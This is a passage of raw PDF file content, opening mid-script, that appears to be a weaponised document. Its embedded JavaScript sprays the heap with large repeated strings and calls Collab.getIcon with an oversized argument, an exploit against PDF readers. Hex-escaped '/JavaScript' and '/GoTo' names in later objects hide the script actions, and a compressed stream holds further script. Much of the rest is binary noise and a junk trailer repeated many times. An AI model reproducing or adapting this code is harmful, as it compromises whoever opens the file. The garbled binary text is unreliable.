Y.substring(0,wFM);ZTJ=KBY.substring(0,KBY.length-wFM);while(ZTJ.length+wFM<0x40000)ZTJ=ZTJ+ZTJ+elW;JCe=[];for(Uwp=0;Uwp<180;Uwp++)JCe[Uwp]=ZTJ+gVf;var ysT=4012;var WDe=Array(ysT);for(Uwp=0;Uwp<ysT;Uwp++)
{WDe[Uwp]=KaX("\u000a\u000a\u000a\u000a");}
Collab.getIcon(WDe+"_N"+".b"+"un"+"dl"+"e");}
app.eval();
app.eval();
endstream
endobj
73 0 obj<</Subtype/XML/Length 224/Type/Metadata>>stream
©N> u «а©1XЄѕ»&Ї Єш'v/щ(шпС;с-nsd02`Б№Ђ0_5¦ћќ9%lч|Ъ|5‘•@ Ж‹эся ЄLД"  –Љ “©д«9иhS/ќkSЃcш-2T†ЮсѕqИ   ЊѓМwF} oN РХbљEИ iH\\ Лт
endstream
endobj
116 0 obj
<</ / / / /Filter/#46#6c#61#74#65#44#65#63#6f#64#65/Length 1000+987>>
stream
x^�W[o � ~ϯ@�X�� z��/�� in- � X`	KБ�3I� '��$ ����U;!^�۾� �Դ�^�]U�  �� O�{�r�] �ϻͫ� ��o}�t����n~19�m-�^.��q ���`^@��[��O�/z� Q����`49�Cɶ l\��vN~� F_6"�_���' s �  �C�.�k���V�G��� � <k���s��I7�m���t�����d2�"jk�͎ '?��+�`��|�f�-��ك�{�<��a���q�fj��5�R |�	t ��L�C �j �� �����^U U��l�  �R��B	��_��ք!��r�M�Z�Xی��%` l �i����m�ȩ�S�G�*'�&�Ԥ�u�"O"���,�%'��#�5�*�
OB���Kr&ʀ�\ڈu�k:aK)r���N/�4l�s2� �2�?� �(E��r�!@�q�y(Sd�ڄ�se�$d���U	=�%:�մX	O��o�
��*`���h˻
0� �<�
��J�����AS[ZR*
V<�T �O$��_�� ����ʶ�U%�� ���{]�<	��)���Nrd/���W< ��o��e   c<!ߍ� _��F�r����VS3?U��O�*`�COU3"���9v � ��y
� )�@n������5��  l�(�d��=�麍�l���b�Z�� ��#�����T��[�$�Z��1�ͤ"\���2R� +���� �C�����y�'Ж�rZj漩�)m� ��%�1�cV�\� 0 � L� >� ��I� �[�-C�󐴊�O ����_ ��Wfe �>אju�� DIA�Ni��"�H%)OiS�?�K$ 3�(�x%'�� ���  v	�Yd�)'g[3Kmʓ�-�I����fM|.<�B��e��N�C?��-  6�� �K[��3א�]�t�e� �M#>X ��<�� �  �� � ��� �
1�ر_� ͳB]���_�����y�����=x� ��ڔ�.���Y ��oG� d> "�/\Cu�}4%�$NAl��� ! ��og��U/�gE_ }t���   ������� � �w[D�z8 \K8����8��;& e_�N� ���  q��+�L����βܤ A
 �� '���ó�t|�rq6�Zւ�  ��x2ݙ ���1J?���m�^ �"�_�&��v�� ~��Yw����ǟ0�o�z�i��" n>??�����u�  �a �� �Z ��� _
��w�Wc����Go.wn R+Ne/��U�MS�C
dʳ�*��Jj�]_�8�� � ��+����Ք5�R�Ԑ2e�jL N�4�>Bj&sڤ������ N���  ǵ��:�h�JP�^ �^�,�( V�&&�y�� # ��-'k�*�i��S���{j�Cͩ�9�3%w�xw� �3��ږuuc��lk�u��W x���6H*��^qV�@N� *�7"� l!jT�� d}Y���m	� � �@� � ���  
��n  �� aK�c��S)�}ɾ�����3 �V�D �-�
N[;h3 ��o�jyӊ7�U�U o㩀���_w�Ne�4oi:��M @m�-
	"
�颶x 4N��SOh�j%K�x����@
��� {�� ԑy��# >L�Cm����|�r��s?>�+P��� �\��Q �;��U��>K�� "��� � � ��B�mg���諀�`�  �� ���[��j�I��}.z ��;ܬ�N�2��]� u|2� �v���)WT �a� ϗ��b2�:�ccq��=�zÞQ �਷	ε�y��ߜ��  ���ּ;�� ���w������� �����P�{�Z�� j&Tw � ��C�B5�P�P�{�^�� j.�� � j ��#)w_��G����t���  ? �� �^��я p� � .'�|Q�ǿ��H�ޔ�ޚ ��?2�  �ێ�Vo�;��滅��� � X q2Vw��� �7� � �sX ��� ~׮�d ����7��J 	O|��s�z ����5� �
� +�'u��"G���s�x����   �wX�  �/��O ��L%i|66] �:@㵳� ����k0FU��
�i,5� Q?_6V���n�sx6�Cr���3�#�  �3��N :r� =Wj�x�K K�v�L+�)w�M�	�
��rN�, I��8 vB"%
endstream
endobj
95 0 obj
<</ / / / /Direction/L2R/ / / />>
endobj
1990 0 obj
<</ / / / /S/#4a#61#76#61#53#63#72#69#70#74/JS 116 0 R/ / / />>
endobj
95 0 obj
<</ / / / /Direction/L2R/ / / />>
endobj
1 0 obj
<</ / / / /Typp/Action/S/#47#6f#54#6f/D[9 0 /XYZ 0 504 #31]/ / / />>
endobj
5 0 obj
<</ / / / /Typp/Action/S/#47#6f#54#6f/D[9 0 /XYZ 0 504 #31]/ / / />>
endobj
9 0 obj
<</ / / / /count 2/Type/Pages/Kids[1894 0 R]/ / / />>
endobj
123 0 obj
<</ / / / /Length 0000>>
stream
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
endstream
endobj
23 0 obj<</CropBox[0 0 595.22 842]/Parent 62 0 R/Contents 25 0 R/Rotate 0/MediaBox[0 0 595.22 842]/Resources 24 0 R/Type/Page>>
endobj
24 0 obj<</ColorSpace<</Cs6 59 0 R>>/Font<</TT2 52 0 R/TT3 54 0 R/TT4 45 0 R>>/ProcSet[/PDF/Text]/ExtGState<</GS1 57 0 R>>>>
endobj
25 0 obj[26 0 R 27 0 R 28 0 R]
endobj
26 0 obj<</Length 3>>stream
Y.в
endstream
endobj
91 0 obj
<</ / / / /S/JavaScript/JS 123 0 R/ / / />>
endobj
xref
trailer
<<
/Root 15 0 R
>>
startxrefxګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �